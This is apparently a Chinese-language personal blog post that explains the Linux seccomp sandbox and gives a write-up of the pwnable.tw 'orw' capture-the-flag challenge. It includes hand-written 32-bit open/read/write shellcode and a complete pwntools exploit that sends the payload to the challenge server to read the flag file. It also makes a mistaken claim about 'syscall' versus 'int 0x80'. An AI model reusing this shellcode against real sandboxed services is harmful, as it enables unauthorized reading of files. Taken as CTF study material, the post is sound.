<!DOCTYPE html>
<html>
  <head>
      <script>
  var _hmt = _hmt || []
  ;(function() {
    var hm = document.createElement('script')
    hm.src = 'https://hm.baidu.com/hm.js?5a0acc897fd96474a2c8f4deac84611a'
    var s = document.getElementsByTagName('script')[0]
    s.parentNode.insertBefore(hm, s)
  })()
</script> 
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />
    <meta name="keywords" content="" />
    <meta name="description" content="" />
    
    <title>
      Seccomp机制学习 - Rin
    </title>
    <link rel="manifest" href="/manifest.json" />
    <link rel="shortcut icon" href="/images/favicon.ico" type="image/x-icon" />
    
<link rel="stylesheet" href="../../../../style/style.css">

  <meta name="generator" content="Hexo 5.4.0"></head>
  <body>
    <canvas id='pagemap'></canvas>
    
    <div id="post-toc" class="animated hiddenToc hide">
      <span class="title">Toc</span>
      <ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link"><span class="toc-text"></span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#1%EF%BC%89Seccomp%E5%9F%BA%E7%A1%80"><span class="toc-text">1）Seccomp基础</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Seccomp%E7%AE%80%E4%BB%8B"><span class="toc-text">Seccomp简介</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%90%AF%E5%8A%A8Seccomp"><span class="toc-text">启动Seccomp</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#2%EF%BC%89Seccomp-Tools"><span class="toc-text">2）Seccomp-Tools</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#3%EF%BC%89ORW%E4%BE%8B%E9%A2%98"><span class="toc-text">3）ORW例题</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#pwnable-orw"><span class="toc-text">pwnable-orw</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#4%EF%BC%89%E5%8F%82%E8%80%83"><span class="toc-text">4）参考</span></a>
    </div>
    
    <div id="fixed-menu-wrap">
      <span class="iconfont icon-sousuo search-box menu-reset"></span>
      <span class="icon-toc menu-reset">Toc</span>
      <span class="iconfont icon-arrowup menu-reset"></span>
    </div>
    <div id="fixed-menu">
      <span class="iconfont icon-menu-"></span>
    </div>
    <div id="progress">
      <div class="line"></div>
    </div>
    <div id="search-shade" class="animated hiddenSearch hide">
      <div class="input-wrap">
        <span class="iconfont icon-sousuo search-box"></span>
        <input type="text" placeholder="Search" />
        <span class="iconfont icon-close"></span>
      </div>
      <div class="search-result">
        <div class="meta">
          <span><b id="result-count">0</b> results found</span>
          <img src="/images/logo.jpeg" />
        </div>
        <ul id="result-box"></ul>
      </div>
    </div>
    <div id="menu-mask" class="animated hideMenuMask hide">
      <span class="iconfont icon-close"></span>
      <div class="nav">
        
        <a href="../../../../index.html" class="">
          Home
        </a>
        
        <a href="../../../../friends" class="">
          Friends
        </a>
        
        <a href="../../../../about" class="">
          About
        </a>
        
      </div>
    </div>
    <div id="header">
      <div class="intro">
        <a href="/" class="logo" style="background-image: url('/images/logo.jpeg')"></a>
        <div class="author"></div>
      </div>
      <div class="nav">
        <span class="iconfont icon-menu menu-icon"></span>
        <a href="#" class="search-box">
          <span class="iconfont icon-sousuo"></span>
        </a>
      </div>
    </div>
    <div id="side" class="animated bounceInLeft">
      <div class="shrink">
        <a href="/" class="logo" style="background-image: url('/images/logo.jpeg')"></a>
        <span class="iconfont icon-menu toggle-icon"></span>
        <a href="#" class="search-box">
          <span class="iconfont icon-sousuo"></span>
        </a>
      </div>
      <div class="magnify">
        <div class="about">
          <div class="author"></div>
          <a href="/" class="logo" style="background-image: url('/images/logo.jpeg')"></a>
        </div>

        <div class="nav">
          
          <a href="../../../../index.html" class="">
            Home
          </a>
          
          <a href="../../../../friends" class="">
            Friends
          </a>
          
          <a href="../../../../about" class="">
            About
          </a>
          
          <a href="#" class="search-box">
            <span class="iconfont icon-sousuo"></span>
          </a>
        </div>
        <div class="bottom">
          <div class="follow">
            
            <a href="https://github.com" target="_block">
              <span class="iconfont icon-github"></span>
            </a>
             
            <a href="/atom.xml" target="_block">
              <span class="iconfont icon-rss"></span>
            </a>
            
          </div>
        </div>
      </div>
    </div>
    <div id="container">
      <div class="main animated bounceInRight delay-0.7s">
        <article class="post-entry">
    <div class="header">
      
      <div class="title">Seccomp机制学习</div>
      <div class="meta">
        <span class="item">
          <span class="iconfont icon-time-circle"></span>
          <span>2021/11/11</span>
        </span>

        

        
        
         
          <span class="item">
            <span class="iconfont icon-tag1"></span>
            <span>
                
                  
                    <a href="/tags/pwnable">pwnable</a>
                  
                
            </span>
          </span>
         
      </div>
      <div>
      </div>
    </div>
    <html><head></head><body><h3 id=""><a class="post-anchor" href="#"></a></h3><h2 id="1）Seccomp基础">1）Seccomp基础<a class="post-anchor" href="#1）Seccomp基础"></a></h2><h3 id="Seccomp简介">Seccomp简介<a class="post-anchor" href="#Seccomp简介"></a></h3><p>​        就像ALSR，NX这样，Seccomp也是linux内核的一种安全机制。这种保护机制会禁用某些系统调用，有效避免了越权行为的发生。</p>
<h3 id="启动Seccomp">启动Seccomp<a class="post-anchor" href="#启动Seccomp"></a></h3><p>​        如果要编写调用Seccomp的程序，需要先安装相应的头文件。</p>
<pre><code class="bash">apt install libseccomp-dev libseccomp2 seccomp
</code></pre>
<p>Seccomp的模式以及参数比较多，这里只总结比较直观的几点，具体的可以看大佬的博客：<a target="_blank" rel="noopener" href="https://a1ex.online/2020/09/27/seccomp%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/">seccomp学习笔记</a></p>
<pre><code class="c">    scmp_filter_ctx ctx;

    ctx = seccomp_init(SCMP_ACT_ALLOW);/* SCMP_ACT_ALLOW表示在初始化的时候允许所有系统调用，相反的 SCMP_ACT_KILL表示禁用所有系统调用*/

    seccomp_rule_add(ctx, SCMP_ACT_KILL, SCMP_SYS(execve), 0);
//添加一条seccomp规则，第二个参数选择禁用/开启（kill为禁用，allow为开启）第三个参数表示规则处理的具体的系统调用，第四个参数是限制系统调用执行的参数，如果不为0，那么后面会加上更具体的限制系统调用参数的函数参数）
    
seccomp_load(ctx);//调用，使过滤规则生效
</code></pre>
<h2 id="2）Seccomp-Tools">2）Seccomp-Tools<a class="post-anchor" href="#2）Seccomp-Tools"></a></h2><p>​        暂时空着，因为我seccomp dump，系统给我说无权限。这个问题似乎仅限于docker，但是网上并没有类似的烈士为我答疑解惑捏。</p>
<h2 id="3）ORW例题">3）ORW例题<a class="post-anchor" href="#3）ORW例题"></a></h2><h3 id="pwnable-orw">pwnable-orw<a class="post-anchor" href="#pwnable-orw"></a></h3><p>​        pwnable第二题，orw。 </p>
<p>​    </p>
<p>​                <a target="_blank" rel="noopener" href="https://rin777-1306176007.cos.ap-nanjing.myqcloud.com/%E6%88%AA%E5%B1%8F2021-11-15%20%E4%B8%8B%E5%8D%889.41.28.png" data-caption="截屏2021-11-15 下午9.41.28" data-fancybox="images"><img src="https://rin777-1306176007.cos.ap-nanjing.myqcloud.com/%E6%88%AA%E5%B1%8F2021-11-15%20%E4%B8%8B%E5%8D%889.41.28.png" alt="截屏2021-11-15 下午9.41.28"></a></p>
<p>​        这里的沙箱实际是通过prctl来控制实现的。</p>
<blockquote>
<p>(1).PR_SET_SECCOMP(22)：当第一个参数是PR_SET_SECCOMP,第二个参数argv2为1的时候，表示允许的系统调用有read，write，exit和sigereturn；当argv等于2的时候，表示允许的系统调用由argv3指向sock_fprog结构体定义，该结构体成员指向的sock_filter可以定义过滤任意系统调用和系统调用参数。(细节见下图)</p>
<p>(2).PR_SET_NO_NEWPRIVS(38):prctl(38,1,0,0,0)表示禁用系统调用execve()函数，同时，这个选项可以通过fork()函数和clone()函数继承给子进程</p>
<p>copy的宋师傅的博客捏</p>
</blockquote>
<p>​        所以这道题就是一道没有任何坑的orw，我们需要做的就是手写shellcode。</p>
<p>​        参照我之前qwb那道orw的wp，为了读取到flag，我们的步骤如下</p>
<pre><code class="c">sys_open("flag")//读取flag
sys_read("eax","esp",0x40)//eax为sys_oopen的返回值，也就是flag，然后将flag写到esp下
sys_write(1,"esp",0x40)//打印flag的值到屏幕输出
</code></pre>
<p>​        如果要达到可以成功执行的效果，就必须要像写完整汇编一样将所有压栈出栈等对栈顶的操作也考虑进去。</p>
<p>​        手写汇编要尤其注意32位与64位系统传参规则并不相同。尤其是函数使用的寄存器的种类理论上是特定的，如果搞错就直接EOF了。</p>
<p>​        并且进行软中断时使用的指令是<code>int 0x80</code>而不是<code>syscall</code>，<code>syscall</code>是c语言层面上的系统调用，而<code>int 0x80</code>才是汇编层面的系统调用。</p>
<p>​        关于pwntools的asm模块，有一些比较怪的点。</p>
<p>​        比如说我们可以这样写：</p>
<pre><code class="python">payload =  asm("push 0x67616c66;push 0x2f77726f;push 0x2f656d6f;push 0x682f2f2f;mov ebp, esp;mov eax, 0x5;xor ecx, ecx;xor edx, edx;int 0x80;")

也可以这样写
</code></pre>
<pre><code class="python">asm('mov eax, 0')
</code></pre>
<p>​        就是说，可以有分号，也可以没有。</p>
<pre><code class="python">from pwn import*

#p = process("./orw")
#context.terminal = ['tmux', 'splitw', '-h']
#context.update(arch='i386', os='linux')

p = remote("chall.pwnable.tw",10001)
#context.log_level = "debug"

#open
payload =  asm("push ebx ;push 0x67616c66;push 0x2f77726f;push 0x2f656d6f;push 0x682f2f2f;mov ebx, esp;mov eax, 0x5;int 0x80;")
#read
payload += asm("mov eax, 0x3; mov ecx, ebx; mov ebx, eax;mov edx, 0x60;int 0x80;")
#write
payload += asm("mov eax, 0x4;mov ebx, 0x1;int 0x80;")

#gdb.attach(p)
p.sendline(payload)

p.interactive()
</code></pre>
<p>​        完整exp，其实主要是要对32位的传参熟悉，整体编写的难度并不高捏。</p>
<p><a target="_blank" rel="noopener" href="https://rin777-1306176007.cos.ap-nanjing.myqcloud.com/%E6%88%AA%E5%B1%8F2021-11-17%20%E4%B8%8B%E5%8D%8810.28.54.png" data-caption="截屏2021-11-17 下午10.28.54" data-fancybox="images"><img src="https://rin777-1306176007.cos.ap-nanjing.myqcloud.com/%E6%88%AA%E5%B1%8F2021-11-17%20%E4%B8%8B%E5%8D%8810.28.54.png" alt="截屏2021-11-17 下午10.28.54"></a>        </p>
<h2 id="4）参考">4）参考<a class="post-anchor" href="#4）参考"></a></h2><p>prctl函数开始学习沙箱规则](<a target="_blank" rel="noopener" href="https://www.cnblogs.com/L0g4n-blog/p/12839171.html">https://www.cnblogs.com/L0g4n-blog/p/12839171.html</a>)</p>
</body></html>

  
  <div class="post-guide">
    <div class="item left">
        
          <a href="../../17/%E5%A6%99%E6%8E%A7%E9%BC%A0%E6%A0%87%E5%8D%A1%E9%A1%BF%E9%97%AE%E9%A2%98/">妙控鼠标卡顿问题</a>
        
    </div>
    <div class="item right">
        
          <a href="../pwndocker%E7%9A%84pwn%E9%A2%98%E4%BD%93%E9%AA%8C%EF%BC%88%E4%B8%8B%EF%BC%89/">pwndocker的pwn题体验（下</a>
        
    </div>
  </div>

  


  <div id="comment"></div>

  
  <!-- Highlight.js -->

<link rel="stylesheet"
href="//highlightjs.org/static/demo/styles/night-owl.css">
<script src="//cdnjs.cloudflare.com/ajax/libs/highlight.js/10.5.0/highlight.min.js">
</script>
<script>
hljs.initHighlightingOnLoad();

</script>
</article>
        <footer>
          <div class="copyright">
            ©2021
            <a href="https://fuurinko.github.io">Rin777</a> Powered by <a target="_blank" rel="noopener" href="https://hexo.io">Hexo</a> |
            <a target="_blank" rel="noopener" href="https://github.com/shixiaohu2206/hexo-theme-huhu">hexo-theme-huhu</a>
          </div>
          
        </footer>
      </div>
    </div>
  </body>
  
</html>
<script type="text/javascript">
                  window.HUHU_CONFIG = JSON.parse("{\"share\":[\"weibo\",\"weixin\",\"qqkongjian\",\"QQ\",\"douban\",\"facebook\",\"twitter\",\"google\"],\"service_worker\":{\"open\":false}}")
                </script> <script type="text/javascript">window.addEventListener('load', function() {
    
    window.loadJs = function(d, m, a) {
      var c = document.getElementsByTagName('head')[0] || document.head || document.documentElement
      var b = document.createElement('script')
      b.defer = true
      b.setAttribute('type', 'text/javascript')
      b.setAttribute('charset', 'UTF-8')
      b.setAttribute('async', 'true')
      b.setAttribute('src', d)
      m && b.setAttribute('data-main', '/scripts/app-built')
      if (typeof a === 'function') {
        if (window.attachEvent) {
          b.onreadystatechange = function() {
            var e = b.readyState
            if (e === 'loaded' || e === 'complete') {
              b.onreadystatechange = null
              a()
            }
          }
        } else {
          b.onload = a
        }
      }
      c.appendChild(b)
    }
    window.loadJs && window.loadJs('https://cdn.bootcss.com/require.js/2.3.6/require.min.js', true, function() {require.config({"paths":{"util":"util","share":"share","search":"search","pagemap":"pagemap.min","registerSW":"registerSW","valine":"cdn/Valine.min","av":["https://cdn.jsdelivr.net/npm/leancloud-storage/dist/av-min"],"pjax":["https://cdn.bootcss.com/jquery.pjax/2.0.1/jquery.pjax.min"],"jquery":["https://cdn.bootcss.com/jquery/3.4.1/jquery.min"],"confirm":["https://cdn.bootcss.com/jquery-confirm/3.3.4/jquery-confirm.min"],"fancybox":["https://cdn.bootcss.com/fancybox/3.5.7/jquery.fancybox.min"],"chart":["https://cdn.bootcss.com/Chart.js/2.8.0-rc.1/Chart.bundle.min"]},"map":{"*":{"css":"https://cdn.bootcss.com/require-css/0.1.10/css.min.js"}},"shim":{"fancybox":{"deps":["css!https://cdn.bootcss.com/fancybox/3.5.7/jquery.fancybox.min.css"]},"confirm":{"deps":["css!https://cdn.bootcss.com/jquery-confirm/3.3.4/jquery-confirm.min.css"]},"chart":{"deps":["css!https://cdn.bootcss.com/Chart.js/2.8.0-rc.1/Chart.min.css"]}},"waitSeconds":3})})
  })</script>  
